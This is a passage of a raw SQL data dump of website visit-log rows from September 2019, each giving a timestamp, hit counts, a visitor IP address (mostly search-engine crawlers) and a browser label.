260,1568065844,1,1,0,0,'141.8.142.144','other'),(448261,1568065919,2,2,0,0,'66.249.66.138','chrome'),(448262,1568066139,1,1,0,0,'40.77.167.195','other'),(448263,1568066958,1,1,0,0,'141.8.142.162','other'),(448264,1568066968,1,1,0,0,'207.46.13.104','other'),(448265,1568066974,1,1,0,0,'141.8.142.103','other'),(448266,1568067004,1,1,0,0,'213.180.203.48','other'),(448267,1568067215,1,1,0,0,'209.17.96.26','other'),(448268,1568067251,1,1,0,0,'40.77.167.162','other'),(448269,1568067496,2,2,0,0,'66.249.66.134','chrome'),(448270,1568067621,1,0,1,0,'66.249.66.138',''),(448271,1568067677,3,3,0,0,'66.249.66.136','chrome'),(448272,1568068035,2,2,0,0,'66.249.66.68','chrome'),(448273,1568068280,1,1,0,0,'95.108.213.4','other'),(448274,1568068293,1,1,0,0,'178.154.171.30','other'),(448275,1568068667,2,2,0,0,'207.46.13.104','other'),(448276,1568069560,1,1,0,0,'66.249.66.136','chrome'),(448277,1568069997,2,2,0,0,'8.29.198.26','other'),(448278,1568070789,1,1,0,0,'5.45.207.79','other'),(448279,1568071487,2,2,0,0,'141.8.188.29','other'),(448280,1568072272,1,1,0,0,'141.8.188.11','other'),(448281,1568072961,3,3,0,0,'66.249.66.134','chrome'),(448282,1568073455,3,3,0,0,'35.184.130.146','chrome'),(448283,1568073489,3,3,0,0,'104.198.55.234','chrome'),(448284,1568073509,3,3,0,0,'35.224.222.188','chrome'),(448285,1568073521,2,2,0,0,'35.184.242.228','chrome'),(448287,1568073539,3,3,0,0,'35.239.56.197','chrome'),(448288,1568073556,3,3,0,0,'34.68.186.13','chrome'),(448289,1568073915,1,1,0,0,'5.45.207.19','other'),(448290,1568075006,2,2,0,0,'66.249.66.138','chrome'),(448291,1568075263,2,2,0,0,'66.249.66.68','chrome'),(448292,1568078426,1,1,0,0,'141.8.188.29','other'),(448293,1568079306,1,1,0,0,'157.55.39.136','other'),(448294,1568080226,1,1,0,0,'157.55.39.61','other'),(448295,1568080876,1,1,0,0,'8.29.198.25','other'),(448296,1568080928,1,1,0,0,'40.77.167.210','other'),(448297,1568081573,1,1,0,0,'8.29.198.26','other'),(448298,1568081991,1,1,0,0,'95.108.213.4','other'),(448299,1568081992,1,1,0,0,'66.249.66.138','chrome'),(448300,1568081994,2,2,0,0,'141.8.188.29','other'),(448301,1568082056,1,1,0,0,'66.249.66.68','chrome'),(448302,1568083084,2,2,0,0,'40.77.167.210','other'),(448303,1568083112,1,1,0,0,'207.46.13.178','other'),(448304,1568083385,1,1,0,0,'141.8.142.103','other'),(448305,1568083667,3,3,0,0,'66.249.66.136','chrome'),(448306,1568083988,1,1,0,0,'66.249.66.138','chrome'),(448307,1568084460,1,1,0,0,'141.8.188.29','other'),(448308,1568084554,1,1,0,0,'94.153.100.96','chrome'),(448309,1568084558,1,1,0,0,'40.77.167.210','other'),(448310,1568084623,1,1,0,0,'207.46.13.209','other'),(448311,1568085604,1,1,0,0,'66.249.66.138','chrome'),(448312,1568085610,1,1,0,0,'66.249.66.134','chrome'),(448313,1568085700,1,1,0,0,'141.8.188.11','other'),(448314,1568087132,1,1,0,0,'66.249.66.138','chrome'),(448315,1568087372,2,2,0,0,'66.249.66.134','chrome'),(448316,1568088430,1,1,0,0,'91.196.178.132','firefox'),(448317,1568088668,1,1,0,0,'66.249.66.134','chrome'),(448318,1568089263,1,1,0,0,'66.249.66.138','chrome'),(448319,1568089905,1,1,0,0,'40.77.167.210','other'),(448320,1568089969,1,1,0,0,'66.249.66.134','chrome'),(448321,1568090387,1,1,0,0,'193.106.30.99','chrome'),(448322,1568090453,1,1,0,0,'84.17.49.32','chrome'),(448323,1568090797,1,1,0,0,'62.205.134.182','other'),(448324,1568090863,1,1,0,0,'66.249.66.68','chrome'),(448325,1568091285,1,1,0,0,'66.249.66.136','chrome'),(448326,1568091507,1,1,0,0,'66.249.66.138','chrome'),(448327,1568091734,2,2,0,0,'8.29.198.26','other'),(448328,1568092805,2,2,0,0,'40.77.167.210','other'),(448329,1568093361,1,1,0,0,'157.55.39.61','other'),(448330,1568093861,1,1,0,0,'66.249.66.134','chrome'),(448331,1568096196,1,1,0,0,'66.249.66.136','chrome'),(448332,1568097222,1,1,0,0,'157.55.39.61','other'),(448333,1568097869,1,1,0,0,'91.196.178.33','chrome'),(448334,1568098306,1,1,0,0,'128.90.142.182','chrome'),(448335,1568098512,19,19,0,0,'89.163.242.129','other'),(448336,1568098530,1,1,0,0,'66.249.66.136','chrome'),(448337,1568098572,1,1,0,0,'207.46.13.200','other'),(448338,1568098850,1,1,0,0,'141.8.188.29','other'),(448339,1568099248,1,1,0,0,'157.55.39.99','other'),(448340,1568099730,1,1,0,0,'66.249.66.138','chrome'),(448341,1568099944,1,1,0,0,'66.249.66.64','chrome'),(448342,1568100490,1,1,0,0,'5.255.253.38','other'),(448343,1568101233,1,1,0,0,'93.159.230.28','chrome'),(448344,1568101710,1,1,0,0,'141.8.188.11','other'),(448345,1568102035,1,1,0,0,'207.46.13.200','other'),(448346,1568102588,2,2,0,0,'8.29.198.26','other'),(448347,1568102680,1,1,0,0,'66.249.66.136','chrome'),(448348,1568103708,1,1,0,0,'157.55.39.69','other'),(448349,1568104202,1,1,0,0,'141.8.188.29','other'),(448350,1568105395,1,1,0,0,'5.255.253.5','other'),(448351,1568105768,1,1,0,0,'46.211.107.240','chrome'),(448352,1568105770,1,1,0,0,'66.249.88.64','chrome'),(448353,1568105778,2,2,0,0,'66.249.83.202','chrome'),(448354,1568105777,1,1,0,0,'66.249.88.67','chrome'),(448355,1568105977,1,1,0,0,'66.249.66.68','chrome'),(448356,1568106045,1,1,0,0,'66.249.66.66','chrome'),(448357,1568106397,1,1,0,0,'66.249.66.138','chrome'),(448358,1568107671,1,1,0,0,'66.249.66.68','chrome'),(448359,1568107683,2,2,0,0,'66.249.66.138','chrome'),(448360,1568107865,1,1,0,0,'141.8.142.81','other'),(448361,1568107894,1,1,0,0,'141.8.188.29','other'),(448362,1568108048,1,1,0,0,'157.55.39.69','other'),(448363,1568109163,1,1,0,0,'37.9.113.20','other'),(448364,1568109217,2,2,0,0,'91.196.178.169','chrome'),(448365,1568109237,1,1,0,0,'66.249.66.136','chrome'),(448366,1568109763,2,2,0,0,'66.249.66.134','chrome'),(448367,1568109994,1,1,0,0,'109.173.30.145','msie'),(448368,1568110273,1,1,0,0,'5.45.207.19','other'),(448369,1568110921,1,1,0,0,'207.46.13.200','other'),(448370,1568111778,1,1,0,0,'46.172.76.19','firefox'),(448371,1568111851,2,2,0,0,'194.37.248.11','chrome'),(448372,1568112701,1,1,0,0,'66.249.66.136','chrome'),(448373,1568112717,1,1,0,0,'66.249.66.64','chrome'),(448374,1568112782,1,1,0,0,'66.249.66.138','chrome'),(448375,1568112833,1,1,0,0,'87.250.224.47','other'),(448376,1568113461,2,2,0,0,'8.29.198.25','other'),(448377,1568113482,1,1,0,0,'157.55.39.99','other'),(448378,1568113631,1,1,0,0,'157.55.39.197','other'),(448379,1568114287,1,1,0,0,'66.249.66.138','chrome'),(448380,1568114645,1,1,0,0,'157.55.39.243','other'),(448381,1568114733,1,1,0,0,'91.196.178.174','chrome'),(448382,1568114896,1,1,0,0,'207.46.13.72','other'),(448383,1568116003,1,1,0,0,'66.249.66.68','chrome'),(448384,1568116262,2,2,0,0,'66.249.66.136','chrome'),(448385,1568116423,1,1,0,0,'37.9.113.20','other'),(448386,1568116810,3,3,0,0,'104.197.111.121','chrome'),(448387,1568116870,1,1,0,0,'46.211.128.143','chrome'),(448388,1568116908,3,3,0,0,'35.184.70.58','chrome'),(448389,1568116946,1,1,0,0,'104.155.130.180','chrome'),(448390,1568116947,2,2,0,0,'104.155.130.180','chrome'),(448391,1568116961,5,5,0,0,'34.66.81.157','chrome'),(448392,1568116985,2,2,0,0,'34.66.219.198','chrome'),(448394,1568117250,1,1,0,0,'109.74.154.72','chrome'),(448395,1568117789,1,1,0,0,'78.111.185.28','chrome'),(448396,1568117901,1,1,0,0,'207.46.13.72','other'),(448397,1568118664,2,2,0,0,'141.8.188.29','other'),(448398,1568118673,1,1,0,0,'91.196.178.131','firefox'),(448399,1568118685,1,1,0,0,'193.106.30.99','chrome'),(448400,1568118830,1,1,0,0,'141.8.188.11','other'),(448401,1568118877,1,1,0,0,'157.55.39.121','other'),(448402,1568119801,1,1,0,0,'157.55.39.121','other'),(448403,1568120024,1,1,0,0,'88.135.229.43','chrome'),(448404,1568120999,1,1,0,0,'31.43.31.181','firefox'),(448405,1568121499,1,1,0,0,'66.249.66.66','chrome'),(448406,1568122004,1,1,0,0,'66.249.66.136','chrome'),(448407,1568122291,1,1,0,0,'207.46.13.72','other'),(448408,1568122472,1,1,0,0,'157.55.39.76','other'),(448409,1568122695,2,2,0,0,'66.249.66.138','chrome'),(448410,1568123491,2,2,0,0,'141.8.188.29','other'),(448411,1568123525,1,1,0,0,'207.46.13.72','other'),(448412,1568123966,2,2,0,0,'207.46.13.144','other'),(448413,1568124325,2,2,0,0,'8.29.198.26','other'),(448414,1568124549,1,1,0,0,'141.8.142.103','other'),(448415,1568124729,2,2,0,0,'141.8.188.11','other'),(448416,1568124907,1,1,0,0,'209.17.96.234','other'),(448417,1568125061,2,2,0,0,'66.249.66.138','chrome'),(448418,1568125111,1,1,0,0,'66.249.66.134','chrome'),(448419,1568125158,1,1,0,0,'3.214.21.251','chrome'),(448420,1568125370,1,1,0,0,'66.249.66.68','chrome'),(448421,1568125494,1,1,0,0,'66.249.66.136','chrome'),(448422,1568125599,1,1,0,0,'157.55.39.93','other'),(448423,1568126640,1,1,0,0,'66.249.66.136','chrome'),(448424,1568126906,1,1,0,0,'66.249.66.138','chrome'),(448425,1568127005,1,1,0,0,'207.46.13.144','other'),(448426,1568127184,1,1,0,0,'157.55.39.93','other'),(448427,1568128283,1,1,0,0,'5.45.207.79','other'),(448428,1568128540,1,1,0,0,'66.249.66.68','chrome'),(448429,1568128546,1,1,0,0,'66.249.66.66','chrome'),(448430,1568128547,1,1,0,0,'207.46.13.144','other'),(448431,1568128828,1,1,0,0,'141.8.188.29','other'),(448432,1568129322,1,1,0,0,'66.249.66.136','chrome'),(448433,1568130596,1,1,0,0,'207.46.13.144','other'),(448434,1568130606,1,1,0,0,'66.249.66.138','chrome'),(448435,1568130686,1,1,0,0,'141.8.188.11','other'),(448436,1568130836,1,1,0,0,'66.249.66.66','chrome'),(448437,1568130839,1,1,0,0,'66.249.66.134','chrome'),(448438,1568130865,1,1,0,0,'207.46.13.72','other'),(448439,1568130891,2,2,0,0,'188.163.74.182','chrome'),(448440,1568131801,1,1,0,0,'141.8.188.29','other'),(448441,1568133096,1,1,0,0,'66.249.66.134','chrome'),(448442,1568133295,1,1,0,0,'5.45.207.19','other'),(448443,1568134518,1,1,0,0,'87.250.224.47','other'),(448444,1568135191,2,2,0,0,'8.29.198.26','other'),(448445,1568135333,1,1,0,0,'66.249.66.68','chrome'),(448446,1568136119,1,1,0,0,'66.249.66.136','chrome'),(448447,1568136146,1,1,0,0,'141.8.188.11','other'),(448448,1568137244,1,1,0,0,'5.45.207.79','other'),(448449,1568137843,2,2,0,0,'66.249.66.138','chrome'),(448450,1568138449,1,1,0,0,'95.108.181.75','other'),(448451,1568138531,1,1,0,0,'157.55.39.244','other'),(448452,1568138749,2,2,0,0,'157.55.39.93','other'),(448453,1568139249,1,1,0,0,'37.52.17.191','other'),(448454,1568141910,1,1,0,0,'207.46.13.1','other'),(448455,1568142286,1,1,0,0,'66.249.66.68','chrome'),(448456,1568143213,2,2,0,0,'66.249.66.138','chrome'),(448457,1568143234,1,1,0,0,'66.249.66.134','chrome'),(448458,1568144495,1,1,0,0,'66.249.66.64','chrome'),(448459,1568145293,2,2,0,0,'141.8.188.29','other'),(448460,1568145838,2,2,0,0,'157.55.39.76','other'),(448461,1568146050,2,2,0,0,'8.29.198.25','other'),(448462,1568146059,1,1,0,0,'40.77.167.59','other'),(448463,1568146504,1,1,0,0,'87.250.224.107','other'),(448464,1568146746,1,1,0,0,'66.249.66.134','chrome'),(448465,1568146788,1,1,0,0,'40.77.167.100','other'),(448466,1568147714,1,1,0,0,'79.137.130.5','chrome'),(448467,1568147777,1,1,0,0,'66.249.66.138','chrome'),(448468,1568147782,1,1,0,0,'66.249.66.134','chrome'),(448469,1568147950,1,1,0,0,'116.203.115.229','chrome'),(448470,1568148355,2,2,0,0,'66.249.66.136','chrome'),(448471,1568148440,1,1,0,0,'60.191.38.77','firefox'),(448472,1568149081,1,1,0,0,'5.45.207.79','other'),(448473,1568149107,1,1,0,0,'207.46.13.21','other'),(448474,1568150147,1,1,0,0,'66.249.66.136','chrome'),(448475,1568150334,1,1,0,0,'66.249.66.66','chrome'),(448476,1568150396,2,2,0,0,'66.249.66.134','chrome'),(448477,1568151324,1,1,0,0,'66.249.66.136','chrome'),(448478,1568151738,1,1,0,0,'157.55.39.155','other'),(448479,1568152480,1,1,0,0,'66.249.66.68','chrome'),(448480,1568152575,1,1,0,0,'66.249.66.136','chrome'),(448481,1568153130,1,1,0,0,'176.100.21.97','chrome'),(448482,1568153386,1,1,0,0,'199.16.157.182','other'),(448483,1568153650,1,1,0,0,'157.55.39.155','other'),(448484,1568153747,1,1,0,0,'66.249.66.136','chrome'),(448485,1568153879,1,1,0,0,'141.8.188.29','other'),(448486,1568154966,1,1,0,0,'176.100.21.97','chrome'),(448487,1568154980,1,1,0,0,'40.77.167.100','other'),(448488,1568155338,1,1,0,0,'66.249.66.64','chrome'),(448489,1568155405,1,1,0,0,'66.249.66.138','chrome'),(448490,1568155515,1,1,0,0,'66.249.66.136','chrome'),(448491,1568155791,1,1,0,0,'66.249.66.68','chrome'),(448492,1568156597,1,1,0,0,'207.46.13.81','other'),(448493,1568156896,1,1,0,0,'8.29.198.25','other'),(448494,1568157378,3,3,0,0,'66.249.66.134','chrome'),(448495,1568157506,1,1,0,0,'8.29.198.26','other'),(448496,1568157606,3,3,0,0,'66.249.66.136','chrome'),(448497,1568157623,2,2,0,0,'207.46.13.93','other'),(448498,1568158279,2,2,0,0,'66.249.66.138','chrome'),(448499,1568158981,2,2,0,0,'66.249.66.136','chrome'),(448500,1568159119,2,2,0,0,'66.249.66.68','chrome'),(448501,1568159297,1,1,0,0,'141.8.188.29','other'),(448502,1568159369,1,1,0,0,'66.249.66.138','chrome'),(448503,1568159527,1,1,0,0,'157.55.39.60','other'),(448504,1568159937,1,1,0,0,'66.249.66.134','chrome'),(448505,1568161378,2,2,0,0,'66.249.66.138','chrome'),(448506,1568162960,1,1,0,0,'35.167.100.150','other'),(448507,1568163024,1,1,0,0,'150.95.81.167','firefox'),(448508,1568163062,1,1,0,0,'141.8.188.65','other'),(448509,1568163396,1,1,0,0,'141.8.188.11','other'),(448510,1568163468,1,1,0,0,'66.249.66.138','chrome'),(448511,1568164431,2,2,0,0,'66.249.66.66','chrome'),(448512,1568165035,3,3,0,0,'66.249.66.136','chrome'),(448513,1568165485,3,3,0,0,'66.249.66.134','chrome'),(448514,1568165978,1,1,0,0,'66.249.66.136','chrome'),(448515,1568166246,1,1,0,0,'66.249.66.64','chrome'),(448516,1568166691,1,1,0,0,'66.249.66.68','chrome'),(448517,1568166905,1,1,0,0,'157.55.39.237','other'),(448518,1568167218,1,1,0,0,'66.249.66.138','chrome'),(448519,1568167587,4,4,0,0,'66.249.66.136','chrome'),(448520,1568167750,1,1,0,0,'5.45.207.19','other'),(448521,1568167767,2,2,0,0,'8.29.198.26','other'),(448522,1568167885,1,1,0,0,'157.55.39.237','other'),(448523,1568168824,2,2,0,0,'141.8.188.29','other'),(448524,1568168968,2,2,0,0,'66.249.66.136','chrome'),(448525,1568168970,2,2,0,0,'66.249.66.134','chrome'),(448526,1568169096,1,1,0,0,'5.45.207.19','other'),(448527,1568169122,1,1,0,0,'157.55.39.234','other'),(448528,1568169314,1,1,0,0,'173.212.233.72','chrome'),(448529,1568169769,1,1,0,0,'40.77.167.160','other'),(448530,1568170355,1,1,0,0,'66.249.66.138','chrome'),(448531,1568170419,2,2,0,0,'141.8.188.11','other'),(448532,1568170528,1,1,0,0,'66.249.66.134','chrome'),(448533,1568170648,1,1,0,0,'66.249.66.68','chrome'),(448534,1568170884,1,1,0,0,'66.249.66.136','chrome'),(448535,1568172222,1,1,0,0,'66.249.66.136','chrome'),(448536,1568172683,1,1,0,0,'5.45.207.19','other'),(448537,1568172692,1,1,0,0,'141.8.142.103','other'),(448538,1568172869,1,1,0,0,'94.153.96.111','chrome'),(448539,1568173737,2,2,0,0,'66.249.66.138','chrome'),(448540,1568173893,1,1,0,0,'66.249.66.136','chrome'),(448541,1568174303,1,1,0,0,'5.45.207.19','other'),(448542,1568174435,1,1,0,0,'157.55.39.234','other'),(448543,1568176722,1,1,0,0,'157.55.39.237','other'),(448544,1568177182,1,1,0,0,'62.205.134.182','other'),(448545,1568177539,1,1,0,0,'66.249.66.138','chrome'),(448546,1568178041,1,1,0,0,'207.46.13.74','other'),(448547,1568178296,1,1,0,0,'157.55.39.234','other'),(448548,1568178633,2,2,0,0,'8.29.198.26','other'),(448549,1568178971,1,1,0,0,'141.8.188.29','other'),(448550,1568179157,1,1,0,0,'66.249.66.64','chrome'),(448551,1568179302,1,1,0,0,'157.55.39.237','other'),(448552,1568179318,2,2,0,0,'66.249.66.136','chrome'),(448553,1568179358,1,1,0,0,'207.46.13.74','other'),(448554,1568180028,2,2,0,0,'66.249.66.134','chrome'),(448555,1568180446,1,1,0,0,'141.8.188.29','other'),(448556,1568181360,1,1,0,0,'66.249.66.134','chrome'),(448557,1568181628,1,1,0,0,'66.249.66.138','chrome'),(448558,1568182252,1,1,0,0,'141.8.188.29','other'),(448559,1568182267,1,1,0,0,'66.249.66.136','chrome'),(448560,1568184393,2,2,0,0,'66.249.66.136','chrome'),(448561,1568184654,1,1,0,0,'91.196.178.94','chrome'),(448562,1568185725,1,1,0,0,'157.55.39.35','other'),(448563,1568186873,1,1,0,0,'157.55.39.103','other'),(448564,1568187668,1,1,0,0,'91.209.11.236','other'),(448565,1568188893,1,1,0,0,'66.249.66.64','chrome'),(448566,1568189236,1,1,0,0,'66.249.66.134','chrome'),(448567,1568189497,2,2,0,0,'8.29.198.26','other'),(448568,1568189568,1,1,0,0,'157.55.39.103','other'),(448569,1568189622,1,1,0,0,'66.249.66.138','chrome'),(448570,1568189988,1,1,0,0,'66.249.66.136','chrome'),(448571,1568190295,1,1,0,0,'5.45.207.19','other'),(448572,1568190560,1,1,0,0,'66.249.66.64','chrome'),(448573,1568191792,1,1,0,0,'66.249.66.138','chrome'),(448574,1568191870,1,1,0,0,'66.249.66.136','chrome'),(448575,1568192136,1,1,0,0,'157.55.39.35','other'),(448576,1568192166,1,1,0,0,'195.24.154.186','firefox'),(448577,1568193395,1,1,0,0,'66.249.66.134','chrome'),(448578,1568194150,1,1,0,0,'157.55.39.35','other'),(448579,1568194441,1,1,0,0,'141.8.142.103','other'),(448580,1568195675,1,1,0,0,'66.249.66.138','chrome'),(448581,1568195748,1,1,0,0,'91.196.178.163','chrome'),(448582,1568196186,2,2,0,0,'66.249.66.134','chrome'),(448583,1568196615,2,2,0,0,'157.55.39.103','other'),(448584,1568197103,1,1,0,0,'87.250.224.64','other'),(448585,1568197596,1,1,0,0,'157.55.39.35','other'),(448586,1568197686,1,1,0,0,'141.8.188.11','other'),(448587,1568198075,1,1,0,0,'66.249.66.64','chrome'),(448588,1568198125,1,1,0,0,'66.249.66.68','chrome'),(448589,1568198129,1,1,0,0,'66.249.66.66','chrome'),(448590,1568198203,1,1,0,0,'91.196.178.163','chrome'),(448591,1568198577,2,2,0,0,'95.213.141.126','opera'),(448592,1568199279,1,1,0,0,'66.249.66.136','chrome'),(448593,1568199334,2,2,0,0,'66.249.66.66','chrome'),(448594,1568200375,1,1,0,0,'8.29.198.26','other'),(448595,1568200889,1,1,0,0,'8.29.198.25','other'),(448596,1568200908,1,1,0,0,'91.209.11.236','other'),(448597,1568201806,1,1,0,0,'91.76.119.29','chrome'),(448598,1568201931,1,1,0,0,'157.55.39.103','other'),(448599,1568202108,1,1,0,0,'66.249.66.134','chrome'),(448600,1568202493,1,1,0,0,'95.132.38.152','chrome'),(448601,1568202846,1,1,0,0,'207.46.13.49','other'),(448602,1568203384,2,2,0,0,'66.249.66.138','chrome'),(448603,1568203403,2,2,0,0,'66.249.66.134','chrome'),(448604,1568203447,3,3,0,0,'35.238.98.74','chrome'),(448605,1568204890,1,1,0,0,'5.45.207.79','other'),(448606,1568204898,1,1,0,0,'141.8.188.29','other'),(448607,1568205254,1,1,0,0,'82.207.96.172','chrome'),(448608,1568205530,1,1,0,0,'109.74.154.72','chrome'),(448609,1568205544,1,1,0,0,'66.249.66.136','chrome'),(448610,1568206116,1,1,0,0,'141.8.188.11','other'),(448611,1568206614,1,1,0,0,'207.46.13.49','other'),(448612,1568206632,3,3,0,0,'66.249.66.134','chrome'),(448613,1568206750,1,1,0,0,'66.249.66.66','chrome'),(448614,1568207094,1,1,0,0,'66.249.66.68','chrome'),(448615,1568207103,1,1,0,0,'66.249.66.138','chrome'),(448616,1568207729,1,1,0,0,'207.46.13.14','other'),(448617,1568208289,2,2,0,0,'91.196.177.15','chrome'),(448618,1568208297,1,1,0,0,'40.77.167.73','other'),(448619,1568208442,1,1,0,0,'66.249.66.66','chrome'),(448620,1568208805,1,1,0,0,'66.249.66.138','chrome'),(448621,1568209640,1,1,0,0,'207.46.13.14','other'),(448622,1568209824,1,1,0,0,'141.8.188.29','other'),(448623,1568210061,2,2,0,0,'5.255.253.38','other'),(448624,1568210592,1,1,0,0,'66.249.66.66','chrome'),(448625,1568210912,1,1,0,0,'207.46.13.14','other'),(448626,1568210964,1,1,0,0,'66.249.66.134','chrome'),(448627,1568211011,1,1,0,0,'141.8.188.29','other'),(448628,1568211134,1,1,0,0,'66.249.66.136','chrome'),(448629,1568211250,2,2,0,0,'8.29.198.25','other'),(448630,1568212196,2,2,0,0,'66.249.66.136','chrome'),(448631,1568212720,1,1,0,0,'66.249.66.66','chrome'),(448632,1568212777,1,1,0,0,'40.77.167.73','other'),(448633,1568212922,2,2,0,0,'66.249.66.134','chrome'),(448634,1568213705,1,1,0,0,'34.204.176.189','other'),(448635,1568214117,1,1,0,0,'66.249.66.134','chrome'),(448636,1568214255,1,1,0,0,'66.249.66.138','chrome'),(448637,1568214473,2,2,0,0,'5.45.207.79','other'),(448638,1568215137,1,1,0,0,'66.249.66.136','chrome'),(448639,1568215520,2,2,0,0,'66.249.66.134','chrome'),(448640,1568216081,2,2,0,0,'66.249.66.68','chrome'),(448641,1568216117,1,1,0,0,'207.46.13.14','other'),(448642,1568216664,1,1,0,0,'5.45.207.79','other'),(448643,1568217992,1,1,0,0,'66.249.66.66','chrome'),(448644,1568218008,1,1,0,0,'141.8.188.11','other'),(448645,1568218347,1,1,0,0,'95.108.213.4','other'),(448646,1568218388,1,1,0,0,'87.250.224.47','other'),(448647,1568218620,1,1,0,0,'207.46.13.14','other'),(448648,1568218928,1,1,0,0,'66.249.66.64','chrome'),(448649,1568219155,1,1,0,0,'66.249.66.136','chrome'),(448650,1568219221,3,3,0,0,'66.249.66.134','chrome'),(448651,1568219256,1,1,0,0,'46.211.72.67','chrome'),(448652,1568219471,1,1,0,0,'5.45.207.8','other'),(448653,1568219748,2,2,0,0,'66.249.66.138','chrome'),(448654,1568220737,2,2,0,0,'66.249.66.138','chrome'),(448655,1568220902,1,1,0,0,'66.249.66.136','chrome'),(448656,1568221072,1,1,0,0,'66.249.66.68','chrome'),(448657,1568221357,2,2,0,0,'66.249.66.134','chrome'),(448658,1568222133,1,1,0,0,'8.29.198.26','other'),(448659,1568222482,1,1,0,0,'207.46.13.14','other'),(448660,1568222574,1,1,0,0,'178.154.200.48','other'),(448661,1568222579,1,1,0,0,'8.29.198.25','other'),(448662,1568222809,1,1,0,0,'66.249.66.136','chrome'),(448663,1568223044,1,1,0,0,'66.249.66.138','chrome'),(448664,1568223343,1,1,0,0,'66.249.66.134','chrome'),(448665,1568223383,1,1,0,0,'141.8.188.29','other'),(448666,1568223789,1,1,0,0,'66.249.66.136','chrome'),(448667,1568224815,1,1,0,0,'207.46.13.170','other'),(448668,1568224871,1,1,0,0,'5.45.207.19','other'),(448669,1568225680,1,1,0,0,'91.209.11.236','other'),(448670,1568225829,1,1,0,0,'157.55.39.170','other'),(448671,1568225954,2,2,0,0,'66.249.66.138','chrome'),(448672,1568226508,1,1,0,0,'157.55.39.53','other'),(448673,1568226832,1,1,0,0,'157.55.39.134','other'),(448674,1568228519,2,2,0,0,'66.249.66.138','chrome'),(448675,1568229323,2,2,0,0,'66.249.66.134','chrome'),(448676,1568229616,1,1,0,0,'5.45.207.79','other'),(448677,1568230610,1,1,0,0,'77.111.247.62','chrome'),(448678,1568230679,1,1,0,0,'66.249.66.66','chrome'),(448679,1568231495,1,1,0,0,'141.8.188.29','other'),(448680,1568231571,2,2,0,0,'66.249.66.136','chrome'),(448681,1568231591,1,1,0,0,'5.62.19.40','chrome'),(448682,1568232140,1,1,0,0,'141.8.188.11','other'),(448683,1568232358,1,1,0,0,'207.46.13.170','other'),(448684,1568232730,1,1,0,0,'66.249.66.66','chrome'),(448685,1568233002,2,2,0,0,'8.29.198.25','other'),(448686,1568233268,1,1,0,0,'141.8.188.29','other'),(448687,1568233459,1,1,0,0,'207.46.13.170','other'),(448688,1568234058,1,1,0,0,'66.249.66.138','chrome'),(448689,1568234081,1,1,0,0,'66.249.66.136','chrome'),(448690,1568234219,1,1,0,0,'31.13.127.22','other'),(448691,1568234932,1,1,0,0,'66.249.66.134','chrome'),(448692,1568235019,1,1,0,0,'66.249.66.66','chrome'),(448693,1568235454,2,2,0,0,'157.55.39.134','other'),(448694,1568235556,1,1,0,0,'95.108.181.75','other'),(448695,1568235626,2,2,0,0,'66.249.66.136','chrome'),(448696,1568235961,2,2,0,0,'141.8.188.29','other'),(448697,1568237226,1,1,0,0,'66.249.66.66','chrome'),(448698,1568237836,1,1,0,0,'5.45.207.79','other'),(448699,1568238213,1,1,0,0,'141.8.188.11','other'),(448700,1568238882,1,1,0,0,'77.120.172.18','chrome'),(448701,1568239032,1,1,0,0,'66.249.66.134','chrome'),(448702,1568239179,1,1,0,0,'66.249.66.136','chrome'),(448703,1568239639,1,1,0,0,'66.249.66.138','chrome'),(448704,1568239833,1,1,0,0,'37.53.193.119','firefox'),(448705,1568240163,2,2,0,0,'66.249.66.136','chrome'),(448706,1568240214,1,1,0,0,'66.249.66.134','chrome'),(448707,1568241456,1,1,0,0,'95.108.213.4','other'),(448708,1568241663,1,1,0,0,'5.45.207.79','other'),(448709,1568242018,1,1,0,0,'66.249.66.136','chrome'),(448710,1568242533,1,1,0,0,'40.77.167.107','other'),(448711,1568242780,1,1,0,0,'141.8.188.29','other'),(448712,1568243123,1,1,0,0,'66.249.66.134','chrome'),(448713,1568243863,1,1,0,0,'8.29.198.25','other'),(448714,1568244263,1,1,0,0,'8.29.198.27','other'),(448715,1568244324,2,2,0,0,'66.249.66.138','chrome'),(448716,1568244566,1,1,0,0,'141.8.188.29','other'),(448717,1568245059,1,1,0,0,'195.242.179.114','chrome'),(448718,1568245458,3,3,0,0,'66.249.66.134','chrome'),(448719,1568245625,1,1,0,0,'157.55.39.87','other'),(448720,1568245760,1,1,0,0,'40.77.167.107','other'),(448721,1568246455,1,1,0,0,'40.77.169.27','other'),(448722,1568246751,3,3,0,0,'35.193.172.197','chrome'),(448723,1568246765,3,3,0,0,'34.66.141.38','chrome'),(448724,1568246777,2,2,0,0,'34.67.29.66','chrome'),(448726,1568246789,2,2,0,0,'35.222.253.222','chrome'),(448728,1568247641,1,1,0,0,'87.250.224.47','other'),(448729,1568247678,1,1,0,0,'87.250.224.65','other'),(448730,1568247719,1,1,0,0,'141.8.188.29','other'),(448731,1568247945,1,1,0,0,'66.249.66.134','chrome'),(448732,1568248788,3,3,0,0,'141.8.188.29','other'),(448733,1568249063,1,1,0,0,'157.55.39.185','other'),(448734,1568249651,2,2,0,0,'66.249.66.134','chrome'),(448735,1568249803,1,1,0,0,'95.108.213.4','other'),(448736,1568249890,2,2,0,0,'66.249.66.68','chrome'),(448737,1568250035,1,1,0,0,'40.77.167.23','other'),(448738,1568250186,1,1,0,0,'40.77.167.8','other'),(448739,1568250918,1,1,0,0,'5.45.207.19','other'),(448740,1568251363,1,1,0,0,'66.249.66.136','chrome'),(448741,1568251405,1,1,0,0,'40.77.167.23','other'),(448742,1568251880,1,1,0,0,'66.249.66.134','chrome'),(448743,1568253285,1,1,0,0,'66.249.66.64','chrome'),(448744,1568253368,1,1,0,0,'66.249.66.134','chrome'),(448745,1568253918,1,1,0,0,'66.249.66.66','chrome'),(448746,1568254744,2,2,0,0,'8.29.198.25','other'),(448747,1568254960,1,1,0,0,'40.77.167.50','other'),(448748,1568255028,2,2,0,0,'66.249.66.138','chrome'),(448749,1568255295,1,1,0,0,'66.249.66.134','chrome'),(448750,1568255297,1,1,0,0,'40.77.167.23','other'),(448751,1568256702,1,1,0,0,'5.255.253.25','other'),(448752,1568257041,1,1,0,0,'66.249.66.134','chrome'),(448753,1568257661,1,1,0,0,'46.211.216.205','chrome'),(448754,1568258088,1,1,0,0,'216.145.17.190','firefox'),(448755,1568258773,1,1,0,0,'66.249.66.66','chrome'),(448756,1568258914,1,1,0,0,'141.8.188.29','other'),(448757,1568259588,1,1,0,0,'195.128.17.206','other'),(448758,1568259632,1,1,0,0,'40.77.167.23','other'),(448759,1568261144,1,1,0,0,'66.249.66.134','chrome'),(448760,1568261324,1,1,0,0,'66.249.66.68','chrome'),(448761,1568261380,1,1,0,0,'40.77.167.8','other'),(448762,1568261615,2,2,0,0,'66.249.66.136','chrome'),(44